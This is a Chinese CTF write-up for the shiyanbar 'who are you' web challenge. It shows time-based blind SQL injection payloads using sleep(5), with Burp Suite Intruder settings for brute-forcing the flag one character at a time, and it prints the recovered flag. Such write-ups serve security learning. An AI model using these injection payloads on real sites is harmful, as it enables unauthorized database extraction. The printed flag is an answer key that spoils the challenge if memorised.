实验吧-who are you burpsuite爆破

链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php

1.首先先设定burpsuite的timeout为4秒

2.构造语句判断flag的长度

1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1


点击go之后raw中没有显示,等待五秒后alerts选项卡中出现了timeout的提示,说明flag的长度就是32

3.把数据包发送到intruder中进行爆破



这里需要把 attack type 改成 cluster bomb

构造语句为
1' and (select case when (select ord(substring(flag from 1 for 1)) from flag limit 1) = 2 then sleep(5) else 1 end) and '1'='1

接下来设置payload

  之后还要注意把线程设置为1,以及去掉URL-encode勾选

 

接下来就是开始爆破

 

这里面status 为空白的,就是请求超时的

payload1对应的flag的顺序,payload2对应的是flag中的ASCII码,自己一个一个对照就可以得到flag

cdbf14c9551d5be5612f7bb5d2867853

题目还要加上ctf{}

 

转载于:https://www.cnblogs.com/baifan2618/p/7868343.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值